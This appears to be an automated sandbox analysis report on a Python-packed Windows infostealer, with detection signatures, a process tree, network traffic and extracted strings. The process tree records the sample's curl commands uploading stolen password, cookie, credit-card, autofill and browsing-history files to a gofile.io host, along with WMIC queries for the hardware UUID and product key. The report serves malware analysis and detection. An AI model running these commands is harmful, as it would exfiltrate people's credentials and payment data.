Windows Analysis Report
main.exe

Overview

General Information

Sample name: main.exe
Analysis ID: 1579350
MD5: c0e4c8f676e781c9dd3d57ffa4f99111
SHA1: 94a6f60949f38da538b5227722698dd880961bb2
SHA256: 9c08a9aca45b1a4e36e0dc907eebead439bff5b2048b1f2248afa4f88520812d
Tags: exe, user-JaffaCakes118

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found pyInstaller with non standard icon
Tries to harvest and steal browser information (history, passwords, etc)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Usage Of Web Request Commands And Cmdlets
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • main.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\main.exe" MD5: C0E4C8F676E781C9DD3D57FFA4F99111)
    • conhost.exe (PID: 1188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • main.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\main.exe" MD5: C0E4C8F676E781C9DD3D57FFA4F99111)
      • cmd.exe (PID: 4500 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • WMIC.exe (PID: 7012 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5576 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 5808 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 5440 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 3940 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 7052 cmdline: C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 7152 cmdline: wmic path softwarelicensingservice get OA3xOriginalProductKey MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3868 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 648 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 7012 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 4092 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 5440 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 648 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 3868 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 4852 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 7104 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 4476 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
  • cleanup
No configs have been found
No yara matches
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger, Data: Command: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile", CommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\main.exe", ParentImage: C:\Users\user\Desktop\main.exe, ParentProcessId: 7084, ParentProcessName: main.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile", ProcessId: 5576, ProcessName: cmd.exe
No Suricata rule has matched

AV Detection

Source: main.exe, Avira: detected
Source: main.exe, Virustotal: Detection: 23%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 98.7% probability
Source: C:\Users\user\Desktop\main.exe, File created: C:\Users\user\AppData\Local\Temp\_MEI44642\MarkupSafe-3.0.2.dist-info\LICENSE.txt
Source: main.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\main.exe, Code function: 0_2_00007FF6ABA48840 FindFirstFileExW,FindClose,0_2_00007FF6ABA48840
Source: C:\Users\user\Desktop\main.exe, Code function: 0_2_00007FF6ABA47800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6ABA47800
Source: C:\Users\user\Desktop\main.exe, Code function: 0_2_00007FF6ABA62AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6ABA62AE4
Source: Joe Sandbox View, IP Address: 208.95.112.1
Source: Joe Sandbox View, IP Address: 45.112.123.126
Source: unknown, DNS query: name: ip-api.com
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected:
    GET /servers HTTP/1.1
    Accept-Encoding: identity
    Host: api.gofile.io
    User-Agent: Python-urllib/3.11
    Connection: close
Source: global traffic, HTTP traffic detected:
    GET /json/ HTTP/1.1
    Host: ip-api.com
    User-Agent: python-requests/2.32.3
    Accept-Encoding: gzip, deflate, br, zstd
    Accept: */*
    Connection: keep-alive
Source: global traffic, HTTP traffic detected:
    GET /json/8.46.123.189?fields=192511 HTTP/1.1
    Host: ip-api.com
    User-Agent: python-requests/2.32.3
    Accept-Encoding: gzip, deflate, br, zstd
    Accept: */*
    Connection: keep-alive
Source: global traffic, DNS traffic detected: DNS query: api.gofile.io
Source: global traffic, DNS traffic detected: DNS query: ip-api.com
Source: main.exe, 00000002.00000003.1928622951.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930531879.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1935934101.000001ED8D81A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924199076.000001ED8D82E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907759919.000001ED8D82D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1918350007.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941474977.000001ED8D837000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938307594.000001ED8D82F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1932981213.000001ED8D801000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938854162.000001ED8D832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
Source: main.exe, 00000002.00000003.1926012954.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1950364654.000001ED8D4E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927086397.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909966205.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911716442.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941583881.000001ED8D4DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: main.exe, 00000002.00000003.1926012954.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1928622951.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930531879.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1920665904.000001ED8D74C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1928933984.000001ED8D959000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1939447579.000001ED8D57B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1920995696.000001ED8D959000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1962573654.000001ED8D804000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1917178840.000001ED8D739000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1903392797.000001ED8D573000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1962216554.000001ED8D753000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1918350007.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927086397.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1935975187.000001ED8D578000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914520303.000001ED8D71A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1932981213.000001ED8D801000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1903897207.000001ED8D959000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926478409.000001ED8D753000.00000004.00000020.00020000.00000000.sdmp, main.exe, 
00000002.00000003.1909966205.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: main.exe, 00000002.00000002.1958092560.000001ED8CB70000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958594536.000001ED8D050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
Source: main.exe, 00000002.00000003.1905565915.000001ED8CAAC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1780531437.000001ED8CA7E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8CA7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/unittest.html
Source: main.exe, 00000002.00000002.1958092560.000001ED8CB70000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1776106217.000001ED8C854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://github.com/ActiveState/appdirs
Source: main.exe, 00000002.00000002.1959196306.000001ED8D301000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904341699.000001ED8D300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
Source: main.exe, 00000002.00000003.1904551547.000001ED8D414000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1939032150.000001ED8D437000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D414000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926938744.000001ED8D426000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1960119247.000001ED8D438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
Source: main.exe, 00000002.00000003.1911856580.000001ED8C92B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8C8F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909775081.000001ED8C8F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1921891539.000001ED8C932000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1957111921.000001ED8C943000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924615358.000001ED8C942000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: main.exe, 00000002.00000003.1924091069.000001ED8D6F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
Source: main.exe, 00000002.00000003.1950643827.000001ED8D400000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959875871.000001ED8D407000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911117871.000001ED8D3F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941809930.000001ED8D3F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
Source: main.exe, 00000002.00000003.1924091069.000001ED8D6F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es~d
Source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732425887.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731949764.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732176744.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732425887.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731949764.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732176744.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732425887.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731949764.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732176744.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: main.exe, 00000000.00000003.1732855164.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731314081.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732655882.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1730437895.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732425887.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1731949764.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1733664156.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1732176744.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: main.exe, 00000002.00000002.1958092560.000001ED8CB70000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.1956147178.000001ED8C670000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: main.exe, 00000002.00000003.1949579089.000001ED8D6C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1934358364.000001ED8D2A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1945704298.000001ED8D6BB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1906540519.000001ED8D2A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961554809.000001ED8D6CC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931645550.000001ED8C7C9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904072781.000001ED8D2A0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1925413265.000001ED8D2A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909559842.000001ED8D2A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926629291.000001ED8C7C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
Source: main.exe, 00000002.00000003.1949579089.000001ED8D6C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1945704298.000001ED8D6BB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961554809.000001ED8D6CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/WK
Source: main.exe, 00000002.00000002.1958594536.000001ED8D050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/questions/19622133/
Source: main.exe, 00000002.00000003.1938154397.000001ED8D341000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1944856369.000001ED8D333000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904341699.000001ED8D300000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938154397.000001ED8D32F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930501212.000001ED8D32C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1940967172.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959396594.000001ED8D333000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1933446221.000001ED8D340000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924977485.000001ED8D315000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1946091649.000001ED8D34D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: main.exe, 00000002.00000003.1903709934.000001ED8D360000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926171009.000001ED8D363000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1916973619.000001ED8D362000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1950516555.000001ED8D368000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929213253.000001ED8D363000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959609115.000001ED8D381000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1951003102.000001ED8D37E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: main.exe, 00000002.00000003.1928933984.000001ED8D916000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1937262511.000001ED8D928000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904753768.000001ED8D880000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1963159329.000001ED8D928000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904841401.000001ED8D8A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924011561.000001ED8D8A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/
Source: main.exe, 00000002.00000003.1930654622.000001ED8D881000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930910021.000001ED8D881000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904753768.000001ED8D880000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938394333.000001ED8D882000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: main.exe, 00000002.00000003.1950643827.000001ED8D400000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924091069.000001ED8D6F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959875871.000001ED8D407000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911117871.000001ED8D3F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941809930.000001ED8D3F5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: main.exe, 00000002.00000003.1924091069.000001ED8D6F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: main.exe, 00000002.00000003.1950643827.000001ED8D400000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959875871.000001ED8D407000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911117871.000001ED8D3F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941809930.000001ED8D3F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
